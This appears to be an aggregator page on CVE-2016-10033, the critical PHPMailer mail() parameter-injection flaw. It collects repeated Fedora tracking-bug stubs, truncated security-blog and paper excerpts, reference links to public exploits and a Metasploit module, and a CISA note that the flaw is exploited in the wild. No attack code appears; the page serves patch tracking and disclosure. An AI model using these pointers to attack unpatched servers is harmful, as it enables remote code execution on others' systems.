bugzilla·2017-01-02·CVSS 9.8
CVE-2016-10033 [CRITICAL] CVE-2016-10033 wordpress: phpmailer: Parameter injection via mail() function [epel-all]
CVE-2016-10033 wordpress: phpmailer: Parameter injection via mail() function [epel-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora EPEL.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple support
Bugzilla
CVE-2016-10033 drupal7: phpmailer: Parameter injection via mail() function [epel-all]
bugzilla·2017-01-02·CVSS 9.8
CVE-2016-10033 [CRITICAL] CVE-2016-10033 drupal7: phpmailer: Parameter injection via mail() function [epel-all]
CVE-2016-10033 drupal7: phpmailer: Parameter injection via mail() function [epel-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora EPEL.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported
Bugzilla
CVE-2016-10033 php-PHPMailer: phpmailer: Parameter injection via mail() function [fedora-all]
bugzilla·2017-01-02·CVSS 9.8
CVE-2016-10033 [CRITICAL] CVE-2016-10033 php-PHPMailer: phpmailer: Parameter injection via mail() function [fedora-all]
CVE-2016-10033 php-PHPMailer: phpmailer: Parameter injection via mail() function [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple suppor
Bugzilla
CVE-2016-10033 drupal7: phpmailer: Parameter injection via mail() function [fedora-all]
bugzilla·2017-01-02·CVSS 9.8
CVE-2016-10033 [CRITICAL] CVE-2016-10033 drupal7: phpmailer: Parameter injection via mail() function [fedora-all]
CVE-2016-10033 drupal7: phpmailer: Parameter injection via mail() function [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported ve
Bugzilla
CVE-2016-10033 drupal7: phpmailer: Parameter injection via mail() function [fedora-all]
bugzilla·2017-01-02·CVSS 9.8
CVE-2016-10033 [CRITICAL] CVE-2016-10033 drupal7: phpmailer: Parameter injection via mail() function [fedora-all]
CVE-2016-10033 drupal7: phpmailer: Parameter injection via mail() function [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported ve
Bugzilla
CVE-2016-10033 php-PHPMailer: phpmailer: Parameter injection via mail() function [epel-all]
bugzilla·2017-01-02·CVSS 9.8
CVE-2016-10033 [CRITICAL] CVE-2016-10033 php-PHPMailer: phpmailer: Parameter injection via mail() function [epel-all]
CVE-2016-10033 php-PHPMailer: phpmailer: Parameter injection via mail() function [epel-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora EPEL.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple sup
Bugzilla
CVE-2016-10033 drupal8: phpmailer: Parameter injection via mail() function [fedora-all]
bugzilla·2017-01-02·CVSS 9.8
CVE-2016-10033 [CRITICAL] CVE-2016-10033 drupal8: phpmailer: Parameter injection via mail() function [fedora-all]
CVE-2016-10033 drupal8: phpmailer: Parameter injection via mail() function [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported ve
Bugzilla
CVE-2016-10033 mantis: phpmailer: Parameter injection via mail() function [fedora-all]
bugzilla·2017-01-02·CVSS 9.8
CVE-2016-10033 [CRITICAL] CVE-2016-10033 mantis: phpmailer: Parameter injection via mail() function [fedora-all]
CVE-2016-10033 mantis: phpmailer: Parameter injection via mail() function [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported ver
Bugzilla
CVE-2016-10033 wordpress: phpmailer: Parameter injection via mail() function [fedora-all]
bugzilla·2017-01-02·CVSS 9.8
CVE-2016-10033 [CRITICAL] CVE-2016-10033 wordpress: phpmailer: Parameter injection via mail() function [fedora-all]
CVE-2016-10033 wordpress: phpmailer: Parameter injection via mail() function [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported
arXiv
XGV-BERT: Leveraging Contextualized Language Model and Graph Neural Network for Efficient Software Vulnerability Detection
arxiv_fulltext·2023-09-26
XGV-BERT: Leveraging Contextualized Language Model and Graph Neural Network for Efficient Software Vulnerability Detection
frontmatter
XGV-BERT: Leveraging Contextualized Language Model and Graph Neural Network for Efficient Software Vulnerability Detection
[inst1,inst2]Vu Le Anh [email protected]
[inst1,inst2]Chau Thuan [email protected]
[inst1,inst2]Kiet Van [email protected]
[inst1,inst2]Phan The [email protected]
[inst1,inst2]Van-Hau [email protected]
[inst1]organization=Information Security Laboratory, University of Information Technology,
city=Ho Chi Minh city,
country=Vietnam
[inst2]organization=Vietnam National University Ho Chi Minh City,
city=Hochiminh City,
country=Vietnam
## Abstract
With the advancement of deep learning (DL) in various fields, there are many attempts to reveal software vulnerabilities by data-driven approach. Nonetheless, such existing works lac
arXiv
Lic-Sec: an enhanced AppArmor Docker security profile generator
arxiv_fulltext·2020-09-24
Lic-Sec: an enhanced AppArmor Docker security profile generator
frontmatter
5pt
- 0ex
0cm
0em
Lic-Sec: an enhanced AppArmor Docker security profile generator
[1]Hui Zhu
[email protected]
[1]Christian Gehrmann
[email protected]
[1]Department of Electrical and Information Technology, Lund University, Lund, Sweden
## Abstract
Along with the rapid development of cloud computing technology, containerization technology has drawn much attention from both industry and academia. In this paper, we perform a comparative measurement analysis of Docker-sec, which is a Linux Security Module proposed in 2018, and a new AppArmor profile generator called Lic-Sec, which combines Docker-sec with a modified version of LiCShield, which is also a Linux Security Module proposed in 2015. Docker-sec and LiCShield can be used to enhance Docker container sec
Fortinet
Incomplete Patch: Another Joomla! Core XSS Vulnerability Is Discovered
blogs_fortinet·2018-05-25·CVSS 6.1
CVE-2017-7985 [MEDIUM] Incomplete Patch: Another Joomla! Core XSS Vulnerability Is Discovered
FORTIGUARD LABS THREAT RESEARCH
Incomplete Patch: Another Joomla! Core XSS Vulnerability Is Discovered
By Zhouyuan Yang | May 25, 2018
In a previous FortiGuard Labs blog I documented that Joomla! had failed to patch two Cross-Site Scripting (XSS) vulnerabilities – CVE-2017-7985 and CVE-2017-7986 – that I had previously discovered. After reporting the issue to Joomla!, they released a patch and published a separate security announcement in July of 2017. But this separate patch still doesn’t fully fix the issue. Earlier this year, I discovered a new way to bypass the Joomla! XSS filter at the same injection point. This new vulnerability has been assigned with the CVE ID CVE-2018-11326.
Just as with CVE-2017-7985 and CVE-2017-7986, this new injection point exists in the front end, under th
Fortinet
PHPMailer Powered – Use It, But Also Remember to Update It
blogs_fortinet·2017-02-16·CVSS 9.8
CVE-2016-10033 [CRITICAL] PHPMailer Powered – Use It, But Also Remember to Update It
FORTIGUARD LABS THREAT RESEARCH
PHPMailer Powered – Use It, But Also Remember to Update It
By Tien Phan | February 16, 2017
At the end of last year, a critical vulnerability in PHPMailer that affected millions of websites – CVE-2016-10033 - was discovered by Polish security researcher Dawid Golunski. This vulnerability allows an attacker to compromise the target’s web application by executing remote code on the vulnerable web server.
There are numerous open source web applications that use PHPMailer as their main library for sending emails, including WordPress, Joomla, Yii, SugarCRM…
More than a month after PHPMailer released a patch for this critical vulnerability we compiled this short research, and the result may surprise you. As you will see, there are still a lot of web open sourc
Fortinet
Analysis of PHPMailer Remote Code Execution Vulnerability (CVE-2016-10033)
blogs_fortinet·2017-01-05·CVSS 9.8
CVE-2016-10033 [CRITICAL] Analysis of PHPMailer Remote Code Execution Vulnerability (CVE-2016-10033)
FORTIGUARD LABS THREAT RESEARCH
Analysis of PHPMailer Remote Code Execution Vulnerability (CVE-2016-10033)
By Zhouyuan Yang | January 05, 2017
PHP is an open source, general-purpose scripting language used for web development that can also be embedded into HTML. It has over 9 million users, and is used by many popular tools, such as WordPress, Drupal, Joomla!, and so on. This week, a high-level security update was released to fix a remote code execution vulnerability (CVE-2016-10033) in PHPMailer, which is an open source PHP library for sending emails from PHP websites.
This critical vulnerability is caused by class.phpmailer.php incorrectly processing user requests. As a result, remote attackers are able to execute code on vulnerable servers.
This vulnerability affects PHPMailer versi
Fortinet
Joomla – From Nowhere to High Privilege
blogs_fortinet·2016-10-27·CVSS 9.8
CVE-2016-8870 [CRITICAL] Joomla – From Nowhere to High Privilege
FORTIGUARD LABS THREAT RESEARCH
Joomla – From Nowhere to High Privilege
By Tien Phan | October 27, 2016
Joomla, a popular free and open-source content management system, just released version 3.6.4 that fixed two critical vulnerabilities:
[CVE-2016-8870] - Core - Account Creation: attackers can exploit this vulnerability to create any account in a Joomla system regardless of whether its registration has been disabled.
[CVE-2016-8869] - Core - Elevated Privileges: with the vulnerability above, an attacker not only can register an account in a vulnerable system, but also register with the highest privilege – Administrator.
We took a deeper dive to see how these exploits tick and would like to congratulate Davide Tampellini on his first CVE discovery.
CVE-2016-8870 - From no one to havin
Fortinet
Analysis of PHP's CVE-2016-6289 and CVE-2016-6297
blogs_fortinet·2016-08-10·CVSS 4.3
CVE-2016-6289 [MEDIUM] Analysis of PHP's CVE-2016-6289 and CVE-2016-6297
FORTIGUARD LABS THREAT RESEARCH
Analysis of PHP's CVE-2016-6289 and CVE-2016-6297
By Tony Loi | August 10, 2016
PHP is a programming language that was created in 1995 by Rasmus Lerdorf. And according to W3Techs, it’s dynamically generating content on more than 82% of all websites worldwide. That means hundreds of millions of web servers are vulnerable to the flaws we are describing below.
Last month, FortiGuard discovered two security issues in PHP’s core (CVE-2016-6189) and in PHP’s zip (CVE-2016-6197). These issues affect both the current PHP version 5 and its upcoming version 7. These bugs are located in different part of the code, and feature different functionalities, but they share the same type:
Integer overflow
Stack-based buffer overflow
A well-trained eye can identify these
Greynoiseio
NoiseLetter June 2025
blogs_greynoiseio
NoiseLetter June 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
http://packetstormsecurity.com/files/140291/PHPMailer-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/140350/PHPMailer-Sendmail-Argument-Injection.htmlhttp://seclists.org/fulldisclosure/2016/Dec/78http://www.rapid7.com/db/modules/exploit/multi/http/phpmailer_arg_injectionhttp://www.securityfocus.com/archive/1/539963/100/0/threadedhttp://www.securityfocus.com/bid/95108http://www.securitytracker.com/id/1037533https://developer.joomla.org/security-centre/668-20161205-phpmailer-security-advisory.htmlhttps://github.com/PHPMailer/PHPMailer/releases/tag/v5.2.18https://github.com/PHPMailer/PHPMailer/wiki/About-the-CVE-2016-10033-and-CVE-2016-10045-vulnerabilitieshttps://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.htmlhttps://www.drupal.org/psa-2016-004https://www.exploit-db.com/exploits/40968/https://www.exploit-db.com/exploits/40969/https://www.exploit-db.com/exploits/40970/https://www.exploit-db.com/exploits/40974/https://www.exploit-db.com/exploits/40986/https://www.exploit-db.com/exploits/41962/https://www.exploit-db.com/exploits/41996/https://www.exploit-db.com/exploits/42024/https://www.exploit-db.com/exploits/42221/http://packetstormsecurity.com/files/140291/PHPMailer-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/140350/PHPMailer-Sendmail-Argument-Injection.htmlhttp://seclists.org/fulldisclosure/2016/Dec/78http://www.rapid7.com/db/modules/exploit/multi/http/phpmailer_arg_injectionhttp://www.securityfocus.com/archive/1/539963/100/0/threadedhttp://www.securityfocus.com/bid/95108http://www.securitytracker.com/id/1037533https://developer.joomla.org/security-centre/668-20161205-phpmailer-security-advisory.htmlhttps://github.com/PHPMailer/PHPMailer/releases/tag/v5.2.18https://github.com/PHPMailer/PHPMailer/wiki/About-the-CVE-2016-10033-and-CVE-2016-10045-vulnerabilitieshttps://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.htmlhttps://www.drupal.org/psa-2016-004https://www.exploit-db.com/exploits/40968/https://www.exploit-db.com/exploits/40969/https://www.exploit-db.com/exploits/40970/https://www.exploit-db.com/exploits/40974/https://www.exploit-db.com/exploits/40986/https://www.exploit-db.com/exploits/41962/https://www.exploit-db.com/exploits/41996/https://www.exploit-db.com/exploits/42024/https://www.exploit-db.com/exploits/42221/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2016-10033
2016-12-30
Published
2025-07-07
Added to CISA KEV
Exploited in the wild